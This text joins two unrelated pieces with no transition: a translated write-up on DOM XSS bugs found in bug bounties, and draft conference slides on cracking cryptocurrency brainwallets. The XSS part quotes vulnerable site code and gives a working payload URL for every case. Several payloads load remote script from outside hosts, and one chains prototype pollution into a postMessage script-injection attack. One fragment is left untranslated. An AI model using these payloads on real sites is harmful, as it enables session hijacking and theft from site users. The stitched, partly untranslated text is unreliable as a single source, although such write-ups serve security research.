var e = $(".alert.has-icon")
    , t = getURLParameter("sca_success") || ""
    , n = getURLParameter("sca_message") || "";
"true" == t && "true" == n ? (0 < e.length ? showNotification("Your plan has been updated successfully", "success", 5e3) : jQuery.bsAlert.alert({
    text: "Your plan has been updated successfully",
    alertType: "success"
}),
resetPageURL()) : n && (0 < e.length ? showNotification(n, "error", 5e3) : jQuery.bsAlert.alert({
    text: n,
    alertType: "error",
    timeout: 15e3
}),
The sca_message parameter is read into n and displayed through some alert framework, but n is never sanitized, which leads to XSS.
Payload https://test.com/xss?sca_message=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
----- 2
<iframe id="poster-element" class="poster-element" style="width: 100vw; height: 100vh; border: 0"></iframe>
const posterElement = document.getElementById( 'poster-element' )
function getField( name ) {
let fname = document.getElementById( name )
if( !fname ) fname = document.getElementById( 'data-' + name )
let val
if( fname ) {
const isCheckbox = fname.matches( '[type="checkbox"]' )
if( isCheckbox ) val = fname.checked
else val = fname.value || fname.content
// check for a hard true (from the checkbox)
if( val === true || (val && val.length > 0) ) return val
else {
val = getURLParameter( name )
if( val && val.length > 0 ) {
if( isCheckbox ) fname.checked = !!val
else fname.value = val
}
}
}
return getURLParameter( name )
}
if( posterElement && !posterElement.src ) {
const posterSrc = getField( 'poster' ) || GLANCE.defaultPoster
if( posterSrc ) {
posterElement.src = posterSrc
posterElement.classList.remove( 'invisible' )
}
else {
posterElement.classList.add( 'invisible' )
}
}
The poster parameter value is assigned to posterElement.src, i.e. the src of the iframe.
Payload https://test.com/xss?poster=javascript:alert(1)
----- 3
function highlightSearchResults() {
    const e = $(".content_block .content_container .content_block_text:last");
    layoutData.enableSearchHighlight && highlightSearchContent("highlight", e);
    var t = getQueryParamByName("attachmentHighlight") || void 0;
    t && $(".content_block_head").after("<div class='infoBox search-attachment-result-box'>Please check the " + layoutData.attachments.toLowerCase() + " for matching keyword '" + t + "' search result</div>")
}
jQuery's after() method inserts the given content after the selected element.
The attachmentHighlight parameter value is read into t and written into the page via after().
Payload https://test.com/xss?attachmentHighlight=%3Csvg%20onload=alert(1)%3E
----- 4
This report contained only this screenshot.
The flow is:
dev=params.get("dev") > sessionStorage.setItem("braze-dev-version",dev) >
var version=sessionStorage.getItem("braze-dev-version") > displayDevMessage(version) >
displayDevMessage(c) {var a=document.createElement("div");a.innerHTML=c;document.body.appendChild(a);
Payload ?dev=%3Cimg%20src=x%20onerror=alert(1)%3E
Since the value is stored in sessionStorage and read back later, this can be considered a persistent XSS: after visiting the PoC once, any page that loads this JS will keep triggering the XSS.
----- 5
let ghSource = getUrlParameter('gh_src');
for (var something in sorted) {
    console.log(something);
    // let options = 'All Categories' + something;
    var sortedReplaced = replaceAll(something.replace(/\s/g, ''), '&', '');
    menuHtml.innerHTML += `<li data-filter="${sortedReplaced}" onClick="(function() { ga('IPTracker.send', 'event','button','click','${sortedReplaced}');})();"><span>${something}</span></li>`;
    // html += `<p class="hide">No data</p>`
    html += ` `
    let categ = array[something];
    html += `<div class="panel ${replaceAll(something.replace(/\s/g, ''), '&', '')}" data-filter="${replaceAll(something.replace(/\s/g, ''), '&', '')}">`
    let jobs = categ;
    for (let j = 0; j < jobs.length; j++) {
        let jobse = jobs[j];
        let location = jobs[j].location.name;
        let url;
        if (ghSource !== undefined) {
            // let url =
            url = (jobs[j].absolute_url, 't=gh_src=', 'gh_src=' + ghSource);
        } else {
            url = jobs[j].absolute_url;
        }
        html += `
            <p class="job" data-location="${replaceAll(location, '&', '')}"><a href="${url}" target="_blank"> ${jobse.title}</a><span>${location}</span></p>
        `
    }
    html += `</div>`
    dataEl.innerHTML = html
}
The gh_src parameter goes through replaceAll into url, and url is written into an <a> tag; but since the parameter was decoded on retrieval, this still leads to XSS.
Payload https://test.com/xss?gh_src=xsstest%22%3E%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
Common pattern: Case 2
Summary: location.href is written directly into the page.
This scenario is still very common.
If you put https://www.google.com/xsspath'"?xssparam'"=xssvalue'"#xsshash'" into the browser's URL bar,
you get https://www.google.com/xsspath'%22?xssparam%27%22=xssvalue%27%22#xsshash'%22
Judging by this result, the browser appears to auto-encode single quotes only in location.search, i.e. in the parameters.
Neither the path nor the hash is encoded, so the hash can be used to break out of any sink that quotes location.href or location.hash in single quotes.
Modifying the path usually 404s the page, so it is only rarely usable, although server-side code that reads part of the path and writes it into the page can still produce reflected XSS.
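The attribute breakout itself can be simulated with plain string concatenation. A minimal sketch (the markup is hypothetical, modeled on the share-link sink in the first case below):

```python
# After navigation, the browser keeps the fragment (hash) verbatim,
# including its single quote; only location.search would get encoded.
location_href = "https://test.com/xss#'onclick='alert(1)"

# A vulnerable page concatenates location.href into a single-quoted attribute:
html = "<a href='https://twitter.com/share?text=" + location_href + "'>Share</a>"
print(html)
# <a href='https://twitter.com/share?text=https://test.com/xss#'onclick='alert(1)'>Share</a>
```

The single quote carried in the hash closes the href value early, and onclick='alert(1)' lands in the tag as a live event handler.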
----- 1
⽹页分享处,任何分享,⽹页分析创建的log请求 各种需要当前页⾯url的地⽅
像这样
document.writeln("<a href='https://twitter.com/share?text=" + location.href + "'targe
t='_blank' rel='noreferrer noopener'>Twitter</a>");
只需要通过 hash 跳出单引号,就可以添加js事件,根据具体标签具体分析,这⾥是a标签所以很多都可以⽤,onclick为举例
Payload https://test.com/xss#'onclick='alert(1)
----- 2
Some form-submission code.
createInput: function(a) {
var b = ""
, e = ""
, c = a.fieldPrefix || ga
, d = a.elementId || a.elementName
, f = a.elementClasses && B(a.elementClasses) ? a.elementClasses : []
, g = "object" === typeof a.elementAttributes ? a.elementAttributes :
{}
, h = "button" === a.type || "submit" === a.type || "checkbox" === a.t
ype || "radio" === a.type || "hidden" === a.type
, k = a.justElement || a.collection || "hidden" === a.type || "button"
=== a.type || "submit" === a.type
, l = "password" === a.type && !Bb && a.placeholder ? "text" : a.type
, n = ("checkbox" === a.type && !a.collection || "radio" === a.type &&
!a.collection) && !a.justElement
, m = a.rendererFieldName
, p = a.rendererChildFieldName
, t = Hc && !a.collection;
I(f, "capture_" + d) || f.push("capture_" + d);
h || (e += q.createLabel(a));
a.validation && a.validation.required && f.push("capture_required");
b += "<input ";
a.hide && (b += "style='display:none' ");
b = b + ("id='" + c + d + "' ") + (Oc(g) + " ");
"text" === a.type || "email" === a.type || "password" === a.type || "file" === a.type ? I(f, "capture_text_input") || f.push("capture_text_input") : "checkbox" === a.type || "radio" === a.type ? I(f, "capture_input_" + a.type) || f.push("capture_input_" + a.type) : "submit" === a.type && (I(f, "capture_btn") || f.push("capture_btn"), I(f, "capture_primary") || f.push("capture_primary"));
b += "data-capturefield='" + a.name + "' ";
a.collection && (b += "data-capturecollection='true' ");
m && (b += "data-capturerendererfield='" + m + "' ");
p && (b += "data-capturerendererchildfieldname='" + p + "' ");
"checkbox" !== a.type && "radio" !== a.type || !a.elementValue ? a.value || "string" === typeof a.displaySavedValue ? (g = a.value,
h = "string" === typeof a.displaySavedValue ? a.displaySavedValue : a.value,
a.displaySavedValue && ed[h] && (g = wd(ed[h]),
"password" === a.type && (l = "password")),
"password" !== a.type && "text" !== a.type && "email" !== a.type || a.errors || !t || Ed.push(c + d),
b += "value='" + g + "' ") : a.placeholder && !Bb ? (b += "value='" + wd(a.placeholder) + "' ",
I(f, "capture_input_placeholder") || f.push("capture_input_placeholder")) : b += "value='' " : b += "value='" + wd(a.elementValue) + "' ";
b = b + ("type='" + l + "' ") + ("class='" + f.join(" ") + "' ");
a.subId && (b += 'data-subid="' + a.subId + '" ');
a.placeholder && (b += "placeholder='" + wd(a.placeholder) + "' ");
if (a.checked || a.elementValue && a.value === a.elementValue)
b += "checked='checked' ";
b += "name='" + a.elementName + "' ";
b += "/>";
e = "checkbox" === a.type || "radio" === a.type ? e + q.createLabel(a,
b) : e + b;
a.modify && q.attachModifyEventHandler(a);
a.publicPrivateToggle && (e += q.createPublicPrivateToggle(a));
n && (e += "</div>");
k || (e += q.createTip(a));
a.profileStoragePath && "undefined" === typeof a.value && q.setElementAttributeWithLocalStorage(a, c + d, "value");
return e
},
d.appendChild(q.domHelpers.createInput({
elementType: "hidden",
fieldPrefix: c,
elementName: "redirect_uri",
elementId: "redirect_uri_" + b,
elementValue: janrain.settings.capture.redirectUri
}));
From the preceding code, janrain.settings.capture.redirectUri = location.href,
so janrain.settings.capture.redirectUri is under our control.
The first block of code looks dizzying, but a quick glance shows it is building an input tag. Most of it does not matter at all; the key part is:
b += "value='" + wd(a.elementValue) + "' "; b = b + ("type='" + l + "' ")
Simplified, this is equivalent to:
b += "value='"+location.href+"'type='hidden'"
Clearly this adds value and type attributes to an <input> tag, with value quoted in single quotes. As discussed, location.href lets us break out of single quotes, but XSS in an <input type='hidden'> is nearly useless. However, we can inject arbitrary attributes before type=, including assigning type ourselves first; the browser then ignores the later type=hidden assignment, which makes the XSS easy.
Payload https://test.com/xss#'autofocus=''onfocus='alert(1)'type='input
Case 3
Summary: the target URL of an XMLHttpRequest is controllable, so the response can be controlled to inject content that causes XSS.
An earlier article of mine, https://jinone.github.io/bugbounty-a-dom-xss/, is one such case.
----- 1
$(document).ready(function() {
    $('#resetform').on("submit",function(e) {
        e.preventDefault();
        if(getParameterByName("target")){
            var password = $("#resetform").find("input[name='password']");
            var referenceID = getParameterByName("referenceID");
            var referenceType = getParameterByName("referenceType")
            var token = getParameterByName("token");
            var target = window.atob(getParameterByName("target"));
            var url = "https://" + target + "/api/v1/reset/" + referenceID;
            var request = new XMLHttpRequest();
            request.open("PUT", url, true);
            request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            request.onreadystatechange = function() {
                if(request.readyState == request.DONE) {
                    var response = request.responseText;
                    var obj = JSON.parse(response);
                    if (request.status == 200) {
                        window.location.replace("thank-you.html");
                    }else{
                        document.getElementById("errormsg").innerHTML = obj['Description'];
                        document.getElementById("errormsg").style.display = "block";
                        document.getElementById("errormsg").scrollIntoView();
                    }
                }
            }
            request.send("password="+password.val()+"&token="+token+"&referenceType="+referenceType);
        }else{
            document.getElementById("errormsg").innerHTML = "There was a problem with your password reset.";
            document.getElementById("errormsg").style.display = "block";
            document.getElementById("errormsg").scrollIntoView();
        }
        return false;
    });
});
The code takes the host from the target parameter (base64-decoded), concatenates it into the URL, sends the request, and checks whether the response status is 200; if not, it writes the Description JSON field from the response body into the page.
We can put a script like this on our server:
<?php
header("HTTP/1.0 201 OK");
header("Access-Control-Allow-Origin: https://qwe.com");
header("Access-Control-Allow-Credentials: true");
header("Access-Control-Allow-Methods: OPTIONS,HEAD,DELETE,GET,PUT,POST");
echo '{"Description":"<img/src=x onerror=alert(1)>"}';
?>
Since var url = "https://" + target + "/api/v1/reset/" + referenceID; appends more content after the host, we can use test.com/xss.php? to turn the trailing part into a harmless query string, then base64-encode it.
Payload https://test.com/reset?target=dGVzdC5jb20veHNzLnBocD8=
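The target value in that payload can be reproduced in a couple of lines (test.com/xss.php? stands in for the attacker-controlled server):

```python
import base64

# The trailing "?" makes the path the victim page appends a harmless query string.
target = "test.com/xss.php?"
encoded = base64.b64encode(target.encode()).decode()
print(encoded)  # dGVzdC5jb20veHNzLnBocD8=

# The victim page then requests:
url = "https://" + base64.b64decode(encoded).decode() + "/api/v1/reset/123"
print(url)  # https://test.com/xss.php?/api/v1/reset/123
```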
----- 2
_h_processUrlArgs: function() {
    var
        h_search = document.location.search,
        h_args,
        h_property,
        h_i, h_cnt;
    if (!h_search) {
        return;
    }
    h_args = h_search.substr(1).split('&');
    for (h_i = 0, h_cnt = h_args.length; h_i < h_cnt; h_i++) {
        h_property = h_args[h_i].split('=');
        switch (h_property[0]) {
            case 'h_debug':
                this._h_debugMode = true;
                break;
            case 'weblibFiles':
                kio.lib._h_buildDescription.h_weblibFiles.h_path = this._h_getPath(h_property[1]);
                this._h_getFile(h_property[1], 'kio.lib._h_buildDescription.h_weblibFiles.h_files');
                this._h_normalizeBuildDescription(kio.lib._h_buildDescription.h_weblibFiles);
                break;
            case 'appFiles':
                kio.lib._h_buildDescription.h_appFiles.h_path = document.location.origin + this._h_getPath(h_property[1]);
                this._h_getFile(h_property[1], 'kio.lib._h_buildDescription.h_appFiles.h_files');
                this._h_normalizeBuildDescription(kio.lib._h_buildDescription.h_appFiles);
                break;
        }
    }
},
_h_getPath: function(h_url) {
    var h_p = h_url.lastIndexOf('/');
    if (-1 !== h_p) {
        h_url = h_url.substr(0, h_p);
    }
    return h_url;
},
_h_getFile: function(h_url, h_variableName) {
    var h_xhr;
    if (window.XMLHttpRequest) {
        h_xhr = new window.XMLHttpRequest();
    } else if (window.ActiveXObject) {
        h_xhr = new window.ActiveXObject('Microsoft.XMLHTTP');
    }
    if (!h_xhr) {
        this.h_reportError('Internal error: Cannot load ' + h_url, 'kLib.js');
        return;
    }
    h_xhr.open('GET', h_url, false);
    h_xhr.send(null);
    if (h_variableName) {
        eval(h_variableName + '=' + h_xhr.responseText + ';');
    } else {
        eval(h_xhr.responseText);
    }
},
Parameter names from document.location.search are matched in a switch and the corresponding action runs, with the parameter value passed in as h_url; the response is fetched via XHR and then, astonishingly, passed straight to eval without any quoting. Both weblibFiles and appFiles work; you only need to host a JS file somewhere.
Payload https://test.com/xss?appFiles=//15.rs/
The cases above cover some common shapes of DOM XSS; keep an eye out for them when hunting this class of bug.
Oddball cases
----- 1
This one was in an OAuth flow.
qs: function(e, t, n) {
if (t)
for (var i in n = n || encodeURIComponent,
t) {
var o = new RegExp("([\\?\\&])" + i + "=[^\\&]*");
e.match(o) && (e = e.replace(o, "$1" + i + "=" + n(t[i])),
delete t[i])
}
return this.isEmpty(t) ? e : e + (-1 < e.indexOf("?") ? "&" : "?") + this.param(t, n)
},
param: function(e, t) {
var n, i, o = {};
if ("string" == typeof e) {
if (t = t || decodeURIComponent,
i = e.replace(/^[\#\?]/, "").match(/([^=\/\&]+)=([^\&]+)/g))
for (var a = 0; a < i.length; a++)
o[(n = i[a].match(/([^=]+)=(.*)/))[1]] = t(n[2]);
return o
}
t = t || encodeURIComponent;
var r, s = e, o = [];
for (r in s)
s.hasOwnProperty(r) && s.hasOwnProperty(r) && o.push([r, "?" === s[r] ? "?" : t(s[r])].join("="));
return o.join("&")
},
responseHandler: function(e, t) {
var a = this
, n = e.location
, i = a.param(n.search);
if (i && i.state && (i.code || i.oauth_token))
r = JSON.parse(i.state),
i.redirect_uri = r.redirect_uri || n.href.replace(/[\?\#].*$/, ""),
r = a.qs(r.oauth_proxy, i),
n.assign(r);
else if ((i = a.merge(a.param(n.search || ""), a.param(n.hash || ""))) && "state"in i) {
try {
var o = JSON.parse(i.state);
a.extend(i, o)
} catch (e) {
var r = decodeURIComponent(i.state);
try {
var s = JSON.parse(r);
a.extend(i, s)
} catch (e) {
console.error("Could not decode state parameter")
}
}
"access_token"in i && i.access_token && i.network ? (i.expires_in && 0 !== parseInt(i.expires_in, 10) || (i.expires_in = 0),
i.expires_in = parseInt(i.expires_in, 10),
i.expires = (new Date).getTime() / 1e3 + (i.expires_in || 31536e3),
l(i, 0, t)) : "error"in i && i.error && i.network ? (i.error = {
code: i.error,
message: i.error_message || i.error_description
},
l(i, 0, t)) : i.callback && i.callback in t && (o = !!("result"in i && i.result) && JSON.parse(i.result),
d(t, i.callback)(o),
u()),
i.page_uri && n.assign(i.page_uri)
} else
"oauth_redirect"in i && n.assign(decodeURIComponent(i.oauth_redirect));
There are several ways to get XSS here.
In responseHandler, as long as the first if condition is satisfied, location.assign() loads a new page r.
Payload https://test.com/xss?state={"oauth_proxy":"javascript:alert(1);//"}&code=xss&oauth_token=xss
The second if was too long; I did not read it.
If neither of the first two ifs matches, the else branch also leads to XSS, and it is the simplest:
Payload https://test.com/xss?oauth_redirect=javascript:alert(1)
But this site's WAF was extremely strict and could not be bypassed at all.
However, in the second branch, else if ((i = a.merge(a.param(n.search || ""), a.param(n.hash || ""))) && "state"in i),
you can see that location.hash is also merged into i, so the final else can still be used to trigger the XSS; and since the hash is never sent to the server, the WAF is useless.
Payload https://test.com/xss#oauth_redirect=javascript:alert(1)
----- 2
<script type="text/javascript">
    window.onload = ()=>{
        var e = window.location.search.replace("?", "").split("&");
        if (void 0 !== e && null != e && "" != e) {
            var t = e[0].split("=");
            if (void 0 !== t && t.length > 0) {
                var l = t[1];
                localStorage.setItem("deploymentJs", l),
                n(l)
            }
        } else {
            var o = localStorage.getItem("deploymentJs") ? localStorage.getItem("deploymentJs") : "https://c.la1-c1cs-ord.xxxxx.com/content/g/js/49.0/deployment.js";
            void 0 !== o && null != o && "" != o && n(o)
        }
        function n(e) {
            let t = document.createElement("script");
            t.setAttribute("src", e),
            void 0 !== e && null != e && "" != e && document.body.appendChild(t)
        }
    }
</script>
Absurd: it takes the value of the first query parameter and uses it as the src of a script tag.
Since the value is stored in localStorage, this amounts to a persistent XSS, as long as the user does not clear the storage themselves or visit a page that carries a parameter.
Payload https://test.com/xss?xss=data:,alert(1)// or
Payload https://test.com/xss?xss=//nj.rs
----- 3
var query = getQueryParams();
$.each(query, function(key, value) {
window[key] = value;
});
function getQueryParams() {
var qs = document.location.search + '&' + document.location.hash.replace('#', '');
qs = qs.split("+").join(" ");
var params = {},
tokens,
re = /[?&]?([^=]+)=([^&]*)/g;
while (tokens = re.exec(qs)) {
params[decodeURIComponent(tokens[1])] = decodeURIComponent(tokens[2]);
}
return params;
}
This apparently intends to store every query and hash parameter on the window object, but that lets you overwrite existing sub-objects, such as location.
Payload https://test.com/xss#location=javascript:alert(1)
In general, use the hash whenever you can, because it is never inspected by the WAF.
----- 4
eval very easily leads to XSS; use it with caution.
String.prototype.queryStringToJSON = String.prototype.queryStringToJSON || function() {
    var params = String(this) // from the code above, this = location.href
, params = params.substring(params.indexOf("?") + 1);
if (params = params.replace(/\+/g, "%20"),
"{" === params.substring(0, 1) && "}" === params.substring(params.length - 1))
return eval(decodeURIComponent(params));
params = params.split(/\&(amp\;)?/);
for (var json = {}, i = 0, n = params.length; i < n; ++i) {
var param = params[i] || null, key, value, key, value, keys, path, cmd, param;
null !== param && (param = param.split("="),
null !== param && (key = param[0] || null,
null !== key && void 0 !== param[1] && (value = param[1],
key = decodeURIComponent(key),
value = decodeURIComponent(value),
keys = key.split("."),
1 === keys.length ? json[key] = value : (path = "",
cmd = "",
$.each(keys, function(ii, key) {
path += '["' + key.replace(/"/g, '\\"') + '"]',
jsonCLOSUREGLOBAL = json,
cmd = "if ( typeof jsonCLOSUREGLOBAL" + path + ' === "undefined" ) jsonCLOSUREGLOBAL' + path + " = {}",
eval(cmd),
json = jsonCLOSUREGLOBAL,
delete jsonCLOSUREGLOBAL
}),
jsonCLOSUREGLOBAL = json,
valueCLOSUREGLOBAL = value,
cmd = "jsonCLOSUREGLOBAL" + path + " = valueCLOSUREGLOBAL",
eval(cmd),
json = jsonCLOSUREGLOBAL,
delete jsonCLOSUREGLOBAL,
delete valueCLOSUREGLOBAL))))
}
return json
}
The first eval: the if merely checks whether the string is wrapped in {}.
Payload 1 https://test.com/xss/?{alert(1)}
The second eval: you just need to arrange, within the content passed to eval, for your own JS to execute.
Testing locally, passing in the following JS gets it executed:
if ( typeof jsonCLOSUREGLOBAL["x"]["\\"]);alert(1);//"] === "undefined" )
jsonCLOSUREGLOBAL["x"]["\\"]);alert(1);//"] = {}
So:
Payload 2 https://test.com/xss/?x.\%22]);alert(1);/%2f=1
The third eval: omitted.
----- 5
postMessage XSS; there seem to be plenty of articles about this type already.
For client-side prototype pollution, see https://github.com/BlackFan/client-side-prototype-pollution. Both of these are also very lucrative in bug bounties.
Here is an XSS that combines the two.
It started like this:
My scanner found a client-side prototype pollution on p8.testa.com and, after a long struggle, I finally got XSS:
https://p8.testa.com/gb/view?ssc=us1&member=chinna.padma&constructor[prototype][jsAttributes][onafterscriptexecute]=alert(document.domain)
But the vendor said this domain was out of scope, and I did not want the effort to go to waste.
So I looked for a postMessage handler on an asset that was clearly in scope:
var POLL_INTERVAL = 2e3,
MAX_POLLS = 3,
    ALLOWED_ORIGINS_REGEX = /^https?\:\/\/([^\/\?]+\.)*((testa|testb|testc)\.(net|com|com\.au))(\:\d+)?([\/\?]|$)/;
function onElementHeightChange(t, n, i, o) {
if (t && n) {
var r = t.clientHeight,
a = 0,
m = 0;
o = o || MAX_POLLS,
"number" == typeof r && (r -= 1),
function e() {
a = t.clientHeight,
m++,
r !== a && (n(), r = a),
                t.onElementHeightChangeTimer && clearTimeout(t.onElementHeightChangeTimer),
                i ? t.onElementHeightChangeTimer = setTimeout(e, i) : m <= o && (t.onElementHeightChangeTimer = setTimeout(e, POLL_INTERVAL))
}()
}
}
window.addEventListener("message",
function(e) {
if (ALLOWED_ORIGINS_REGEX.test(e.origin)) {
if ("string" != typeof e.data) return;
var t = e.source,
n = e.origin,
i = {};
try {
i = JSON.parse(e.data)
} catch (e) {
return
}
var o, r = i.id || 0,
a = i.markup,
m = i.scriptSrc,
c = "",
d = function() {
c = r + ":" + document.body.clientHeight,
t.postMessage(c, n)
};
if (a && (document.body.innerHTML = a, !m)) return void d();
m && ((o = document.createElement("script")).src = m, o.onload = function()
{
onElementHeightChange(document.body, d, i.pollInterval, i.maxPolls)
},
document.body.appendChild(o))
}
})
Clearly, this handler takes the scriptSrc JSON field from the message and uses it as a script src. The origin is validated, but since we have an XSS on a domain matching the whitelist, we can pass the check and still get XSS.
Payload
https://p8.testa.com/gb/view?ssc=us1&member=chinna.padma&constructor[prototype][jsAttributes][onafterscriptexecute]=document.body.innerHTML=%27%3Ciframe%20src=%22https://s.xx.com/yc/html/embed-iframe-min.2d7457d4.html%22%20onload=%22this.contentWindow.postMessage(window.atob(\%27eyJpZCI6IjEiLCJtYXJrdXAiOiJ4Iiwic2NyaXB0U3JjIjoiaHR0cHM6Ly9uai5ycyIsInBvbGxJbnRlcnZhbCI6IngiLCJtYXhQb2xscyI6IngifQ==\%27),\%27*\%27)%22%3E%3C/iframe%3E%27
Conclusion
DOM XSS takes many more forms; I have shared the shapes I ran into most often in bug bounties, for reference only.
Since much of this was excerpted from old reports, there may be mistakes; corrections are welcome, but the main thing is to grasp the idea.
Discussion is welcome too; always learning from the masters 😄
Cracking Cryptocurrency
Brainwallets
Ryan Castellucci
DRAFT SLIDES, WILL BE REVISED!
FOR FINAL VERSION AFTER TALK
https://rya.nc/dc23
Disclaimer
Stealing from people with weak passphrases
isn’t nice. Don’t be an asshole.
What’s a cryptocurrency?
● Bitcoin is the most widely known example.
● Electronic money which can operate without
banks or governments
● Secured with cryptographic algorithms
● Transferred via a sort of electronic check
● Checks are made public to prevent bounces
● Control of key == Control of money
What’s a brainwallet?
● A brainwallet is a cryptocurrency key that is
created from a password (or passphrase)
● Some people believe that this will make their
money harder to steal (or seize)
● Knowledge of password == Control of money
● Sending money to a brainwallet publishes a
hash of it. What if the hash can be cracked?
It seemed like it might be interesting
● Came across a blog post about brainwallets
○ The author made some and posted about
it to see how long they’d take to crack
● I figured writing a cracker would be a fun
way to spend my commute for a few days
● But why try to crack three brainwallets when
you can try to crack all of them?
My first brainwallet cracker
● Simple design, pass a file with pubkeyhashs,
then pipe words/phrases on STDIN
● Written in C using OpenSSL’s crypto
● ~10,000 passwords per second on my PC
● The slowest part, by far, is turning the
private key into a public key. More on that
later.
Taking it for a spin
● I start feeding it password cracking wordlists
● Find some tiny amounts of money
● Scrape wikiquote and a few other sites to
build myself a phraselist
● Run the phraselist - it gets some hits after a
few hours
● Pull balances, see one with 250BTC
Well, that is interesting. Now what?
● 250BTC was worth about $15k
● I wanted to fix this. I’m friends with Dan
Kaminsky. He’s fixed some big things. After
regaining my composure, I called him.
● As luck would have it, he was in town
● We meet up about an hour later to figure out
how to do the right thing
A plan begins to form
● I felt it would be wrong to take and “hope”
find the rightful owner
● I could send some spare change to it and
then take it back
● You can even put short words in a Bitcoin
address, so a subtle message is possible
● My girlfriend (now wife) piped up with “yoink”
That time I accidentally stole 250 BTC
● After getting an appropriate address with
vanitygen, I do some transactions
Oops. :-(
● What’s that other address?
● …why isn’t it in the list of my addresses?
● …
● ...oh, right, that’s my change address…
● ...and Bitcoin had its own opinions on what
outputs should be spent
● Quick, before anyone notices!
Wait, what?
● Bitcoin transactions have inputs and outputs
● Old, unspent outputs are used as inputs on a
new transaction, but they can only be spent
in full
● You might need more than one, and you
might need to make change for yourself
● If you want details, see https://rya.nc/b4
See, I put it back. It’s fine.
● After fixing it, I did a few “run a few cents
through it” transactions
● The owner did not take the hint :-(
● I’ll just find them. The address was funded
by 12DK76obundhnnbGKcaKEn3BcMNNH5SVU4
● That address received a payout from
DeepBit. DeepBit collects email addresses.
Social engineering, Whitehat style
● I send “Tycho” the guy who runs DeepBit
messages via BitcoinTalk, email, and IRC
● Eventually I manage to talk to him on IRC
● I explain that one of his users has coins
stored unsafely, but can’t elaborate
● He wouldn’t give out any user details
● He does agree to contact the user for me
Success.
● The guy emails me, and I ask him to call me
● He does, and I establish that it was indeed
his brainwallet
● He moves the coins and insists on sending
me a small reward
Some history
● August 2011 Kaminsky demos Phidelius, an
OpenSSL hack, mentions Bitcoin as a
possible use https://rya.nc/b5
● January 2012 Casascius adds a brainwallet
entry to the Bitcoin wiki
● April 2012 brainwallet.org comes online
● I couldn’t really find anything pre-2012
How to make a brainwallet
"correct horse battery staple" Passphrase
v v v v v v v v SHA256
c4bbcb1fbec99d65bf59d85c8cb62ee2 Private key
db963f0fe106f483d9afa73bd4e39a8a
v v v v v v v v v v v v v v v v v v v privateToPublic
(UNCOMPRESSED) (COMPRESSED)
04 78d430274f8c5ec1321338151e9f27f4 -> 03 78d430274f8c5ec1321338151e9f27f4 Public key
c676a008bdf8638d07c0b6be9ab35c71 c676a008bdf8638d07c0b6be9ab35c71
a1518063243acd4dfe96b66e3f2ec801 | | | | | | | |
3c8e072cd09b3834a19f81f659cc3455 | | | | | | | | SHA256
v v v v v v v v v v v v v v v v
b57443645468e05a15302932b06b05e0 7c7c6fae6b95780f7423ff9ccf0c552a
580fa00ba5f5e60499c5c7e7d9c7f50e 8a5a7f883bdb1ee6c22c05ce71c1f288
v v v v v v v v v v v v RIPEMD160
c4c5d791fcb4654a1ef5 79fbfc3f34e7745860d7 Hash160
e03fe0ad3d9c598f9827 6137da68f362380c606c (used for tx)
v v v v v v v v v v v v Base58Check
1JwSSubhmg6iPtRjtyqhUYYH7bZg3Lfy1T 1C7zdTfnkzmr13HfA2vNm5SJYRK6nEKyq8 Address
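The first step of that pipeline, passphrase to private key, is a single unsalted SHA-256 and takes one line to reproduce (the elliptic-curve and Base58Check steps need an EC library and are omitted here):

```python
import hashlib

passphrase = "correct horse battery staple"
private_key = hashlib.sha256(passphrase.encode()).hexdigest()
print(private_key)
# c4bbcb1fbec99d65bf59d85c8cb62ee2db963f0fe106f483d9afa73bd4e39a8a
```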
What’s wrong with that?
● It’s an unsalted, un-iterated password hash
that you publish to the world…
● ...and cracking them directly yields
pseudonymous, easily laundered currency
● We’ve known for years that passwords need
to be run through a hardened hash
● People have very poor intuition of how
strong their passphrases are
Better options
● Electrum-style “12 word seed”, computer
generated but memorable with some effort
● WarpWallet allows for a salt (email) and
uses key stretching, but weak passphrases
still a problem
● BIP38 “paper wallets” - print it out and hide it
under your mattress
Key strength
● Usually measured in bits
● Adding a bit doubles the strength
● Adding ten increases it a thousandfold
● Figuring out how many bits a password is
equivalent to is very, very hard
● Microsoft’s estimate was that the average
user’s password was equivalent to ~40 bits
● That seems absurdly high
Key stretching
● Make cracking hard by slowing it down
● scrypt, bcrypt, pbkdf2, sha512crypt, etc
● In practice, you can make it on the order of a
million times slower
● Gain 20 bits +/- 4 bits in effective strength
● Need somewhere between 72 and 128 bits
● There’s a significant shortfall here
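The gap is easy to see with a standard KDF. A sketch using PBKDF2 from Python's standard library (the iteration count and salt are illustrative):

```python
import hashlib

password = b"correct horse battery staple"
salt = b"[email protected]"  # WarpWallet-style: a salt such as an email address

# Un-iterated, unsalted hash: what a classic brainwallet does. One guess = one SHA-256.
fast = hashlib.sha256(password).digest()

# Stretched: 1,000,000 iterations makes each guess roughly a million times
# more expensive, worth about 20 bits of added effective strength.
slow = hashlib.pbkdf2_hmac("sha256", password, salt, 1_000_000)
print(len(slow))  # 32
```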
Extreme key stretching (just an idea)
● Generate a short (16-24 bits) random salt
● Have the KDF chew on it for a few seconds
● Save the output (the shortcut)
● Use the shortcut as salt to a to second KDF
● Without the shortcut, you can spend a few
hours brute forcing the salt
● A vetted scheme for this would be needed
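A minimal sketch of that idea (the parameters, salt width, and construction here are my own assumptions; as the slide says, a vetted scheme would be needed before real use):

```python
import hashlib
import os

def create_wallet(passphrase: bytes, iters: int = 200_000):
    """Setup: pick a short random salt, let the KDF chew on it, save the shortcut."""
    salt = os.urandom(2)                  # 16-bit salt: recoverable by brute force
    shortcut = hashlib.pbkdf2_hmac("sha256", passphrase, salt, iters)
    key = hashlib.pbkdf2_hmac("sha256", passphrase, shortcut, 1000)
    return shortcut, key                  # store the shortcut, spend with the key

def recover_candidates(passphrase: bytes, iters: int = 200_000):
    """Shortcut lost: brute-force all 2**16 salts, checking each candidate key
    against the known address until one matches."""
    for s in range(2 ** 16):
        shortcut = hashlib.pbkdf2_hmac("sha256", passphrase, s.to_bytes(2, "big"), iters)
        yield hashlib.pbkdf2_hmac("sha256", passphrase, shortcut, 1000)
```

An attacker who lacks the shortcut pays the full salt-search cost for every passphrase guess, which is what buys the extra bits of effective strength.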
Actually secure passwords
● Pick it randomly - easy, right?
● Random numbers are hard for humans to
remember
● Password managers!
● What protects the password manager?
● Backups are hard
● Turtles all the way down
Cryptomnemonics
● Humans have a hard time memorizing a
bunch of random numbers
● Turn the random numbers into something
easier to memorize
● Diceware is a very old scheme that does this
● Open problem, actively researched
● I built https://rya.nc/storybits - feedback?
● How easy can we make these things?
